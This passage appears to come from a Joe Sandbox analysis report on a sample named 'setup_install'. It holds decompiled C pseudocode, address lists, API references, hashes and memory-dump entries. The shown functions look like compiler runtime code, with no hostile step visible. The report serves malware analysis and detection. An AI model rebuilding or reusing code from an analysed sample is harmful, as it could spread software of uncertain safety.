												__esi = _v176;
												__edx = __eax + __edi;
												__ecx =  &_v156;
												__eax = E0040E5E0(__eax,  &_v156, __eax + __edi, _v176);
												__esi = _v180;
												if(( *(__esi + 0x63) & 0x00000040) != 0) {
													L34:
													 *((char*)(__esi + __ebx + 0x6c)) = 0;
												}
												L35:
												__edi = _v180;
												 *(_v180 + __ebx * 4) = __eax;
												goto L27;
											case 4:
												_t166 = _v176 +  *((intOrPtr*)(_t202 + _t172 * 8));
												if(_t172[0x4e53f8] > 4) {
													goto L64;
												} else {
													goto L26;
												}
												goto L76;
											case 5:
												__eax =  *(__ebp + __ebx * 8);
												__edi = 0;
												__ecx = 0;
												__esi = __ebx;
												do {
													__eax = __eax + 1;
													__ebx =  *(__eax - 1) & 0x000000ff;
													 *(__eax - 1) & 0x000000ff =  *(__eax - 1) & 0x7f;
													__edx = ( *(__eax - 1) & 0x7f) << __cl;
													__ecx = __ecx + 7;
													__edi = __edi | ( *(__eax - 1) & 0x7f) << __cl;
												} while (__bl < 0);
												__ebx = __esi;
												__esi = _v176;
												__edx = __eax + __edi;
												__ecx =  &_v156;
												__eax = E0040E5E0(__eax,  &_v156, __eax + __edi, _v176);
												L43:
												if( *((char*)(__ebx + 0x4e53f8)) <= 4) {
													L26:
													_t199 = _v180;
													( &(_t172[0x6c]))[_t199] = 1;
													 *((intOrPtr*)(_t199 + _t172 * 4)) = _t166;
													goto L27;
												} else {
													goto L64;
												}
												goto L76;
										}
									}
									goto L76;
									L27:
									_t172 =  &(_t172[1]);
								} while (_t172 != 0x12);
								_t191 =  *((intOrPtr*)(_v180 + 0x60));
								_t169 = _t191 & 0x7fffffff;
								if(_a187 != 0) {
									_t169 = _t191 | 0x80000000;
								}
								 *(_v180 + 0x60) = _t169;
								return _t169;
							}
						}
					}
				}
				L76:
			}



















































                                                                                                                            0x0040ec66
                                                                                                                            0x0040ec6a
                                                                                                                            0x0040ec77
                                                                                                                            0x0040ec7b
                                                                                                                            0x0040ec7b
                                                                                                                            0x0040ec7b
                                                                                                                            0x0040ec7d
                                                                                                                            0x0040ec8a
                                                                                                                            0x0040ec9c
                                                                                                                            0x0040ef06
                                                                                                                            0x0040ef09
                                                                                                                            0x00000000
                                                                                                                            0x0040ef0f
                                                                                                                            0x0040ef0f
                                                                                                                            0x0040ef19
                                                                                                                            0x0040ef1b
                                                                                                                            0x0040ef1b
                                                                                                                            0x0040ef27
                                                                                                                            0x00000000
                                                                                                                            0x0040ef27
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eca2
                                                                                                                            0x0040eca2
                                                                                                                            0x0040eca2
                                                                                                                            0x0040ecaa
                                                                                                                            0x0040ecac
                                                                                                                            0x0040ecac
                                                                                                                            0x0040ecb4
                                                                                                                            0x0040ecbb
                                                                                                                            0x0040ecc4
                                                                                                                            0x0040ed13
                                                                                                                            0x0040ef30
                                                                                                                            0x0040ef40
                                                                                                                            0x0040ef41
                                                                                                                            0x0040ef43
                                                                                                                            0x0040ef44
                                                                                                                            0x0040ef45
                                                                                                                            0x0040ef4c
                                                                                                                            0x0040ef4d
                                                                                                                            0x0040ef51
                                                                                                                            0x0040ef59
                                                                                                                            0x0040ef59
                                                                                                                            0x0040ef59
                                                                                                                            0x0040ef5b
                                                                                                                            0x0040ef6d
                                                                                                                            0x0040ef72
                                                                                                                            0x0040ef79
                                                                                                                            0x00000000
                                                                                                                            0x0040ef7f
                                                                                                                            0x0040ef7f
                                                                                                                            0x0040ef87
                                                                                                                            0x0040ef8e
                                                                                                                            0x0040ef95
                                                                                                                            0x0040effa
                                                                                                                            0x0040effc
                                                                                                                            0x0040f003
                                                                                                                            0x0040f00a
                                                                                                                            0x0040f011
                                                                                                                            0x0040f018
                                                                                                                            0x0040f01f
                                                                                                                            0x0040f026
                                                                                                                            0x0040f02d
                                                                                                                            0x0040f034
                                                                                                                            0x0040f03b
                                                                                                                            0x0040f042
                                                                                                                            0x0040f049
                                                                                                                            0x0040f050
                                                                                                                            0x0040f057
                                                                                                                            0x0040f05e
                                                                                                                            0x0040f065
                                                                                                                            0x0040f065
                                                                                                                            0x0040effa
                                                                                                                            0x0040ef9e
                                                                                                                            0x00000000
                                                                                                                            0x0040efa4
                                                                                                                            0x0040efa4
                                                                                                                            0x0040efac
                                                                                                                            0x0040efae
                                                                                                                            0x0040efae
                                                                                                                            0x0040efba
                                                                                                                            0x0040efc5
                                                                                                                            0x0040efca
                                                                                                                            0x0040efd5
                                                                                                                            0x0040efe0
                                                                                                                            0x0040efe5
                                                                                                                            0x0040eff2
                                                                                                                            0x0040eff2
                                                                                                                            0x0040ef9e
                                                                                                                            0x0040ed19
                                                                                                                            0x0040ed19
                                                                                                                            0x0040ed1f
                                                                                                                            0x0040ed21
                                                                                                                            0x0040ed23
                                                                                                                            0x0040ed23
                                                                                                                            0x0040ed26
                                                                                                                            0x0040ed2f
                                                                                                                            0x0040ed31
                                                                                                                            0x0040ed34
                                                                                                                            0x0040ed36
                                                                                                                            0x0040ed4d
                                                                                                                            0x00000000
                                                                                                                            0x0040ed4d
                                                                                                                            0x0040ecc6
                                                                                                                            0x0040ecc6
                                                                                                                            0x0040eccf
                                                                                                                            0x004986eb
                                                                                                                            0x004986eb
                                                                                                                            0x004986f0
                                                                                                                            0x004986f0
                                                                                                                            0x004986f5
                                                                                                                            0x004986fa
                                                                                                                            0x004986ff
                                                                                                                            0x00498704
                                                                                                                            0x00498709
                                                                                                                            0x0049870e
                                                                                                                            0x00498713
                                                                                                                            0x00498718
                                                                                                                            0x00498720
                                                                                                                            0x00498725
                                                                                                                            0x004014e0
                                                                                                                            0x004014e3
                                                                                                                            0x004014e4
                                                                                                                            0x004014e6
                                                                                                                            0x004014e9
                                                                                                                            0x004014f0
                                                                                                                            0x004014f6
                                                                                                                            0x004014fb
                                                                                                                            0x00401570
                                                                                                                            0x0040157a
                                                                                                                            0x004014fd
                                                                                                                            0x004014fd
                                                                                                                            0x004014ff
                                                                                                                            0x00401506
                                                                                                                            0x00401512
                                                                                                                            0x00401515
                                                                                                                            0x0040151a
                                                                                                                            0x00401522
                                                                                                                            0x00401525
                                                                                                                            0x00401527
                                                                                                                            0x0040152a
                                                                                                                            0x0040152c
                                                                                                                            0x00401534
                                                                                                                            0x00401539
                                                                                                                            0x0040153e
                                                                                                                            0x0040153e
                                                                                                                            0x00401543
                                                                                                                            0x00401545
                                                                                                                            0x0040154d
                                                                                                                            0x00401554
                                                                                                                            0x00401554
                                                                                                                            0x00401556
                                                                                                                            0x00401569
                                                                                                                            0x0040ecd5
                                                                                                                            0x0040ecdb
                                                                                                                            0x0040ece2
                                                                                                                            0x0040ece6
                                                                                                                            0x0040ecf5
                                                                                                                            0x00000000
                                                                                                                            0x0040ecfb
                                                                                                                            0x0040ecfb
                                                                                                                            0x00000000
                                                                                                                            0x0040ecfb
                                                                                                                            0x0040ecfd
                                                                                                                            0x0040ecfd
                                                                                                                            0x0040ed03
                                                                                                                            0x0040ed51
                                                                                                                            0x0040ed55
                                                                                                                            0x0040ed59
                                                                                                                            0x0040ed5b
                                                                                                                            0x0040ed60
                                                                                                                            0x0040ed65
                                                                                                                            0x00000000
                                                                                                                            0x0040ed67
                                                                                                                            0x0040ed6b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eeb0
                                                                                                                            0x0040eeb4
                                                                                                                            0x0040eeb8
                                                                                                                            0x0040eec0
                                                                                                                            0x00000000
                                                                                                                            0x0040eec6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ee30
                                                                                                                            0x0040ee3c
                                                                                                                            0x0040eed3
                                                                                                                            0x00000000
                                                                                                                            0x0040eed9
                                                                                                                            0x0040eed9
                                                                                                                            0x0040eee0
                                                                                                                            0x0040eeec
                                                                                                                            0x00000000
                                                                                                                            0x0040eeee
                                                                                                                            0x0040eef1
                                                                                                                            0x00000000
                                                                                                                            0x0040eef7
                                                                                                                            0x0040eef7
                                                                                                                            0x00000000
                                                                                                                            0x0040eef7
                                                                                                                            0x0040eef1
                                                                                                                            0x0040eeec
                                                                                                                            0x0040ee42
                                                                                                                            0x0040ee42
                                                                                                                            0x0040ee46
                                                                                                                            0x0040ee4e
                                                                                                                            0x0040ee50
                                                                                                                            0x0040ee50
                                                                                                                            0x0040ee55
                                                                                                                            0x0040ee59
                                                                                                                            0x00000000
                                                                                                                            0x0040ee59
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040edd0
                                                                                                                            0x0040edd4
                                                                                                                            0x0040edd6
                                                                                                                            0x0040edd8
                                                                                                                            0x0040ede0
                                                                                                                            0x0040ede0
                                                                                                                            0x0040ede3
                                                                                                                            0x0040ede9
                                                                                                                            0x0040edec
                                                                                                                            0x0040edee
                                                                                                                            0x0040edf1
                                                                                                                            0x0040edf3
                                                                                                                            0x0040edf7
                                                                                                                            0x0040edf9
                                                                                                                            0x0040edfd
                                                                                                                            0x0040ee00
                                                                                                                            0x0040ee07
                                                                                                                            0x0040ee0c
                                                                                                                            0x0040ee14
                                                                                                                            0x0040ee16
                                                                                                                            0x0040ee16
                                                                                                                            0x0040ee16
                                                                                                                            0x0040ee1b
                                                                                                                            0x0040ee1b
                                                                                                                            0x0040ee1f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ed76
                                                                                                                            0x0040ed81
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ee61
                                                                                                                            0x0040ee65
                                                                                                                            0x0040ee67
                                                                                                                            0x0040ee69
                                                                                                                            0x0040ee70
                                                                                                                            0x0040ee70
                                                                                                                            0x0040ee73
                                                                                                                            0x0040ee79
                                                                                                                            0x0040ee7c
                                                                                                                            0x0040ee7e
                                                                                                                            0x0040ee81
                                                                                                                            0x0040ee83
                                                                                                                            0x0040ee87
                                                                                                                            0x0040ee89
                                                                                                                            0x0040ee8d
                                                                                                                            0x0040ee90
                                                                                                                            0x0040ee97
                                                                                                                            0x0040ee9c
                                                                                                                            0x0040eea3
                                                                                                                            0x0040ed87
                                                                                                                            0x0040ed87
                                                                                                                            0x0040ed8b
                                                                                                                            0x0040ed90
                                                                                                                            0x00000000
                                                                                                                            0x0040eea9
                                                                                                                            0x00000000
                                                                                                                            0x0040eea9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ed6b
                                                                                                                            0x00000000
                                                                                                                            0x0040ed93
                                                                                                                            0x0040ed93
                                                                                                                            0x0040ed96
                                                                                                                            0x0040ed9f
                                                                                                                            0x0040eda4
                                                                                                                            0x0040edb0
                                                                                                                            0x0040edb4
                                                                                                                            0x0040edb4
                                                                                                                            0x0040edbd
                                                                                                                            0x0040edca
                                                                                                                            0x0040edca
                                                                                                                            0x0040ece6
                                                                                                                            0x0040eccf
                                                                                                                            0x0040ecc4
                                                                                                                            0x00000000

                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: @$cI
                                                                                                                            • API String ID: 0-647581686
                                                                                                                            • Opcode ID: 6be1fda5f80b6a7fcc39f617e3dce2bd64b61636e65fbdcbbadcb8d4044e4b45
                                                                                                                            • Instruction ID: dc007637b2c7a371d38ff7bcfc678e6d9adc76316e019126a746092fb34b3a0a
                                                                                                                            • Opcode Fuzzy Hash: 6be1fda5f80b6a7fcc39f617e3dce2bd64b61636e65fbdcbbadcb8d4044e4b45
                                                                                                                            • Instruction Fuzzy Hash: 51A191705083458FE720CF29C48479BBBE1FF85318F144C6EE984AB392C779A859CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040EECC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 34COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 32%
                                                                                                                            			E0040EECC(void* __eax, CHAR* __ebx, signed int _a24, signed int _a28, char _a48, signed char _a147, char _a187) {
				void* _v16;
				char* _v40;
				signed int __esi;
				void* __ebp;
				struct HINSTANCE__* _t79;
				struct HINSTANCE__* _t82;
				_Unknown_base(*)()* _t83;
				CHAR* _t85;
				struct HINSTANCE__* _t87;
				_Unknown_base(*)()* _t92;
				void* _t97;
				char** _t98;
				char** _t99;
				struct HINSTANCE__** _t101;
				struct HINSTANCE__** _t102;

				_t85 = __ebx;
				L31:
				while(__eax <= 0x11) {
					__edx =  *(__eax + 0x4e53f8) & 0x000000ff;
					__eax =  *(__esp + 0x30 + __eax * 4);
					if((_a147 & 0x00000040) != 0) {
						goto L27;
					} else {
						if(__dl == 4) {
							__eax =  *__eax;
							L27:
							while( *((char*)(__ebx + 0x4e53f8)) <= 4) {
								do {
									__esi = _a24;
									 *((char*)(__esi + __ebx + 0x6c)) = 1;
									 *(__esi + __ebx * 4) = __eax;
									while(1) {
										L11:
										__ebx = __ebx + 1;
										if(__ebx == 0x12) {
											break;
										}
										if( *(__ebp + 4 + __ebx * 8) > 5) {
											continue;
										} else {
											__eax =  *(__ebp + 4 + __ebx * 8);
											switch( *((intOrPtr*)( *(__ebp + 4 + __ebx * 8) * 4 +  &M004A4E30))) {
												case 0:
													goto L11;
												case 1:
													__esi = _a24;
													__eax = _a28;
													__eax = _a28 +  *(__ebp + __ebx * 8);
													if(( *(__esi + 0x63) & 0x00000040) != 0) {
														goto L18;
													}
													goto L19;
												case 2:
													__eax =  *(__ebp + __ebx * 8);
													if( *((char*)(__esp + __eax + 0x9c)) != 0) {
														goto L31;
													} else {
														__edi = _a24;
														__eax =  *(__esp + 0x30 + __eax * 4);
														if(( *(__edi + 0x63) & 0x00000040) != 0) {
															 *((char*)(__edi + __ebx + 0x6c)) = 0;
														}
														__esi = _a24;
														 *(_a24 + __ebx * 4) = __eax;
														goto L11;
													}
													goto L47;
												case 3:
													__eax =  *(__ebp + __ebx * 8);
													__edi = 0;
													__ecx = 0;
													__esi = __ebx;
													do {
														__eax = __eax + 1;
														__ebx =  *(__eax - 1) & 0x000000ff;
														 *(__eax - 1) & 0x000000ff =  *(__eax - 1) & 0x7f;
														__edx = ( *(__eax - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__eax - 1) & 0x7f) << __cl;
													} while (__bl < 0);
													__ebx = __esi;
													__esi = _a28;
													__edx = __eax + __edi;
													__ecx =  &_a48;
													__eax = E0040E5E0(__eax,  &_a48, __eax + __edi, _a28);
													__esi = _a24;
													if(( *(__esi + 0x63) & 0x00000040) != 0) {
														L18:
														 *((char*)(__esi + __ebx + 0x6c)) = 0;
													}
													L19:
													__edi = _a24;
													 *(_a24 + __ebx * 4) = __eax;
													goto L11;
												case 4:
													goto L9;
												case 5:
													__eax =  *(__ebp + __ebx * 8);
													__edi = 0;
													__ecx = 0;
													__esi = __ebx;
													do {
														__eax = __eax + 1;
														__ebx =  *(__eax - 1) & 0x000000ff;
														 *(__eax - 1) & 0x000000ff =  *(__eax - 1) & 0x7f;
														__edx = ( *(__eax - 1) & 0x7f) << __cl;
														__ecx = __ecx + 7;
														__edi = __edi | ( *(__eax - 1) & 0x7f) << __cl;
													} while (__bl < 0);
													__ebx = __esi;
													__esi = _a28;
													__edx = __eax + __edi;
													__ecx =  &_a48;
													__eax = E0040E5E0(__eax,  &_a48, __eax + __edi, _a28);
													goto L27;
											}
										}
										goto L47;
									}
									__eax = _a24;
									__edx =  *((intOrPtr*)(_a24 + 0x60));
									__eax = __edx;
									__eax = __edx & 0x7fffffff;
									if(_a187 != 0) {
										__eax = __edx;
										__eax = __edx | 0x80000000;
									}
									 *(_a24 + 0x60) = __eax;
									__esp = __esp + 0xbc;
									_pop(__ebx);
									_pop(__esi);
									_pop(__ebp);
									return __eax;
									goto L47;
									L9:
									__eax = _a28;
									__eax = _a28 +  *(__ebp + __ebx * 8);
								} while ( *((char*)(__ebx + 0x4e53f8)) <= 4);
								goto L35;
							}
						}
						break;
					}
					L47:
				}
				L35:
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				abort();
				_t98 = _t97 - 0x1c;
				 *_t98 = "libgcc_s_dw2-1.dll";
				_t79 = GetModuleHandleA(_t85);
				_t99 = _t98 - 4;
				if(_t79 == 0) {
					 *0x49f004 = 0x410d00;
					_t92 = E00410B90;
				} else {
					_t87 = _t79;
					 *_t99 = "libgcc_s_dw2-1.dll";
					_t82 = LoadLibraryA(??);
					_t101 = _t99 - 4;
					 *0x4e5df0 = _t82;
					_v40 = "__register_frame_info";
					 *_t101 = _t87;
					_t83 = GetProcAddress(??, ??);
					_t102 = _t101 - 8;
					_t92 = _t83;
					_v40 = "__deregister_frame_info";
					 *_t102 = _t87;
					 *0x49f004 = GetProcAddress(??, ??);
					_t99 = _t102 - 8;
				}
				if(_t92 != 0) {
					_v40 = 0x4e501c;
					 *_t99 = 0x4ab0f8;
					 *_t92();
				}
				 *_t99 = E00401590;
				return E004014C0();
				goto L47;
			}


















                                                                                                                            0x0040eecc
                                                                                                                            0x00000000
                                                                                                                            0x0040eed0
                                                                                                                            0x0040eed9
                                                                                                                            0x0040eee0
                                                                                                                            0x0040eeec
                                                                                                                            0x00000000
                                                                                                                            0x0040eeee
                                                                                                                            0x0040eef1
                                                                                                                            0x0040eef7
                                                                                                                            0x00000000
                                                                                                                            0x0040ee9c
                                                                                                                            0x0040ed87
                                                                                                                            0x0040ed87
                                                                                                                            0x0040ed8b
                                                                                                                            0x0040ed90
                                                                                                                            0x0040ed93
                                                                                                                            0x0040ed93
                                                                                                                            0x0040ed93
                                                                                                                            0x0040ed99
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ed65
                                                                                                                            0x00000000
                                                                                                                            0x0040ed67
                                                                                                                            0x0040ed67
                                                                                                                            0x0040ed6b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040eeb0
                                                                                                                            0x0040eeb4
                                                                                                                            0x0040eeb8
                                                                                                                            0x0040eec0
                                                                                                                            0x00000000
                                                                                                                            0x0040eec6
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ee30
                                                                                                                            0x0040ee3c
                                                                                                                            0x00000000
                                                                                                                            0x0040ee42
                                                                                                                            0x0040ee42
                                                                                                                            0x0040ee46
                                                                                                                            0x0040ee4e
                                                                                                                            0x0040ee50
                                                                                                                            0x0040ee50
                                                                                                                            0x0040ee55
                                                                                                                            0x0040ee59
                                                                                                                            0x00000000
                                                                                                                            0x0040ee59
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040edd0
                                                                                                                            0x0040edd4
                                                                                                                            0x0040edd6
                                                                                                                            0x0040edd8
                                                                                                                            0x0040ede0
                                                                                                                            0x0040ede0
                                                                                                                            0x0040ede3
                                                                                                                            0x0040ede9
                                                                                                                            0x0040edec
                                                                                                                            0x0040edee
                                                                                                                            0x0040edf1
                                                                                                                            0x0040edf3
                                                                                                                            0x0040edf7
                                                                                                                            0x0040edf9
                                                                                                                            0x0040edfd
                                                                                                                            0x0040ee00
                                                                                                                            0x0040ee07
                                                                                                                            0x0040ee0c
                                                                                                                            0x0040ee14
                                                                                                                            0x0040ee16
                                                                                                                            0x0040ee16
                                                                                                                            0x0040ee16
                                                                                                                            0x0040ee1b
                                                                                                                            0x0040ee1b
                                                                                                                            0x0040ee1f
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ee61
                                                                                                                            0x0040ee65
                                                                                                                            0x0040ee67
                                                                                                                            0x0040ee69
                                                                                                                            0x0040ee70
                                                                                                                            0x0040ee70
                                                                                                                            0x0040ee73
                                                                                                                            0x0040ee79
                                                                                                                            0x0040ee7c
                                                                                                                            0x0040ee7e
                                                                                                                            0x0040ee81
                                                                                                                            0x0040ee83
                                                                                                                            0x0040ee87
                                                                                                                            0x0040ee89
                                                                                                                            0x0040ee8d
                                                                                                                            0x0040ee90
                                                                                                                            0x0040ee97
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040ed6b
                                                                                                                            0x00000000
                                                                                                                            0x0040ed65
                                                                                                                            0x0040ed9b
                                                                                                                            0x0040ed9f
                                                                                                                            0x0040eda2
                                                                                                                            0x0040eda4
                                                                                                                            0x0040edb0
                                                                                                                            0x0040edb2
                                                                                                                            0x0040edb4
                                                                                                                            0x0040edb4
                                                                                                                            0x0040edbd
                                                                                                                            0x0040edc0
                                                                                                                            0x0040edc6
                                                                                                                            0x0040edc7
                                                                                                                            0x0040edc9
                                                                                                                            0x0040edca
                                                                                                                            0x00000000
                                                                                                                            0x0040ed72
                                                                                                                            0x0040ed72
                                                                                                                            0x0040ed76
                                                                                                                            0x0040ed7a
                                                                                                                            0x00000000
                                                                                                                            0x0040ed87
                                                                                                                            0x0040eea9
                                                                                                                            0x00000000
                                                                                                                            0x0040eef1
                                                                                                                            0x00000000
                                                                                                                            0x0040eeec
                                                                                                                            0x004986eb
                                                                                                                            0x004986eb
                                                                                                                            0x004986f0
                                                                                                                            0x004986f5
                                                                                                                            0x004986fa
                                                                                                                            0x004986ff
                                                                                                                            0x00498704
                                                                                                                            0x00498709
                                                                                                                            0x0049870e
                                                                                                                            0x00498713
                                                                                                                            0x00498718
                                                                                                                            0x00498720
                                                                                                                            0x00498725
                                                                                                                            0x004014e6
                                                                                                                            0x004014e9
                                                                                                                            0x004014f0
                                                                                                                            0x004014f6
                                                                                                                            0x004014fb
                                                                                                                            0x00401570
                                                                                                                            0x0040157a
                                                                                                                            0x004014fd
                                                                                                                            0x004014fd
                                                                                                                            0x004014ff
                                                                                                                            0x00401506
                                                                                                                            0x00401512
                                                                                                                            0x00401515
                                                                                                                            0x0040151a
                                                                                                                            0x00401522
                                                                                                                            0x00401525
                                                                                                                            0x00401527
                                                                                                                            0x0040152a
                                                                                                                            0x0040152c
                                                                                                                            0x00401534
                                                                                                                            0x00401539
                                                                                                                            0x0040153e
                                                                                                                            0x0040153e
                                                                                                                            0x00401543
                                                                                                                            0x00401545
                                                                                                                            0x0040154d
                                                                                                                            0x00401554
                                                                                                                            0x00401554
                                                                                                                            0x00401556
                                                                                                                            0x00401569
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • abort.MSVCRT ref: 004986EB
                                                                                                                            • abort.MSVCRT ref: 004986F0
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986F5
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FA
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                            • abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                            • abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID: @
                                                                                                                            • API String ID: 4206212132-2766056989
                                                                                                                            • Opcode ID: 632e3669cdac49eaad0ebad032b9f02f63c4576538098dbe413fff4f5da184e9
                                                                                                                            • Instruction ID: efd7c04a4ef4dbb4c15f552a0e4c23d8c54cd4c748fa8dee40a3dc228a4a8468
                                                                                                                            • Opcode Fuzzy Hash: 632e3669cdac49eaad0ebad032b9f02f63c4576538098dbe413fff4f5da184e9
                                                                                                                            • Instruction Fuzzy Hash: BEE0D17095818845DA116E15C1C43BDDAE0DB43308F54145FDB957F183C73CC863855E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D5E0 Relevance: 22.6, APIs: 15, Instructions: 104COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4206212132-0
                                                                                                                            • Opcode ID: 781aceaf795c348dfa7218e4f2952faeee305c44bfc653f0c7d73402290df9e3
                                                                                                                            • Instruction ID: 033c0cc70408485998a28418338e08f10d3decf690b82d982b08cbb80f143062
                                                                                                                            • Opcode Fuzzy Hash: 781aceaf795c348dfa7218e4f2952faeee305c44bfc653f0c7d73402290df9e3
                                                                                                                            • Instruction Fuzzy Hash: 47212D72B042148FCB00CF98D8C16A5B3B5EBC5318F1C857EE94C5F346C27AA80A97A8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040D760 Relevance: 21.3, APIs: 14, Instructions: 335COMMONCrypto
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 45%
                                                                                                                            			E0040D760(void* __eax, void* __ecx, intOrPtr __edx, void* _a4) {
				void* _v16;
				void* _v20;
				void* _v32;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v57;
				void* _v60;
				char* _v116;
				void* __ebx;
				signed int __edi;
				void* __esi;
				void* _t162;
				struct HINSTANCE__* _t163;
				struct HINSTANCE__* _t166;
				_Unknown_base(*)()* _t167;
				CHAR* _t169;
				struct HINSTANCE__* _t170;
				void* _t173;
				void* _t175;
				_Unknown_base(*)()* _t176;
				void* _t179;
				void* _t180;
				char** _t182;
				char** _t183;
				struct HINSTANCE__** _t185;
				struct HINSTANCE__** _t186;

				_t162 = __eax;
				_t175 = __eax;
				_t180 = _t179 - 0x3c;
				_t173 = _a4;
				_v52 = __edx;
				_v56 = __ecx;
				 *((intOrPtr*)(_t173 + 0x90)) = 0;
				if(__eax >= __edx) {
					L17:
					return _t162;
				} else {
					__eax =  *(__ecx + 0x60);
					__edx =  *(__edi + 0xa4);
					_v48 = __eax;
					__eax = __eax >> 0x1f;
					if(__edx < __eax) {
						_v60 = 0;
						do {
							__eax =  *__esi & 0x000000ff;
							_t14 = __esi + 1; // 0x1
							__ebx = _t14;
							__ecx = __eax;
							__ecx = __eax & 0xffffffc0;
							if(__cl == 0x40) {
								__edi = _a4;
								__eax = __eax & 0x0000003f;
								__esi = __ebx;
								__eax = __eax *  *(0xb0 + __edi);
								 *(__edi + 0xa4) = __eax;
								goto L15;
							} else {
								if(__cl == 0x80) {
									__eax = __eax & 0x0000003f;
									__edi = 0;
									__ecx = 0;
